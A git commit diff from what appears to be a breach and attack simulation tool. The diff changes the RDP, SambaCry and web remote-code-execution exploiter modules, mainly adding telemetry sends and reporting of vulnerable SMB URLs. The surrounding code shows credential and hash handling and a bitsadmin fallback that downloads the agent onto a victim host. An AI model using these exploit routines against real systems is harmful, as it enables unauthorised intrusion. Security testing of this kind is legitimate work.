Merge branch 'attack_report' into brute_force_report

This commit is contained in:
VakarisZ 2019-06-06 15:19:31 +03:00
commit 2ab3be6437
3 changed files with 8 additions and 3 deletions

View File

@ -316,7 +316,7 @@ class RdpExploiter(HostExploiter):
if client_factory.success: if client_factory.success:
if not self._config.rdp_use_vbs_download: if not self._config.rdp_use_vbs_download:
VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING) VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING).send()
self.add_vuln_port(RDP_PORT) self.add_vuln_port(RDP_PORT)
exploited = True exploited = True
self.report_login_attempt(True, user, password) self.report_login_attempt(True, user, password)

View File

@ -82,7 +82,11 @@ class SambaCryExploiter(HostExploiter):
trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash']) trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash'])
if trigger_result is not None: if trigger_result is not None:
successfully_triggered_shares.append((share, trigger_result)) successfully_triggered_shares.append((share, trigger_result))
self.add_vuln_port(self.SAMBA_PORT) url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {'username': creds['username'],
'host': self.host.ip_addr,
'port': self.SAMBA_PORT,
'share_name': share}
self.add_vuln_url(url)
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share]) self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
for share, fullpath in successfully_triggered_shares: for share, fullpath in successfully_triggered_shares:
@ -92,6 +96,7 @@ class SambaCryExploiter(HostExploiter):
LOG.info( LOG.info(
"Shares triggered successfully on host %s: %s" % ( "Shares triggered successfully on host %s: %s" % (
self.host.ip_addr, str(successfully_triggered_shares))) self.host.ip_addr, str(successfully_triggered_shares)))
self.add_vuln_port(self.SAMBA_PORT)
return True return True
else: else:
LOG.info("No shares triggered successfully on host %s" % self.host.ip_addr) LOG.info("No shares triggered successfully on host %s" % self.host.ip_addr)

View File

@ -307,7 +307,7 @@ class WebRCE(HostExploiter):
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp: if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
LOG.info("Powershell not found in host. Using bitsadmin to download.") LOG.info("Powershell not found in host. Using bitsadmin to download.")
backup_command = RDP_CMDLINE_HTTP % {'monkey_path': dest_path, 'http_path': http_path} backup_command = RDP_CMDLINE_HTTP % {'monkey_path': dest_path, 'http_path': http_path}
VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING) VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING).send()
resp = self.exploit(url, backup_command) resp = self.exploit(url, backup_command)
return resp return resp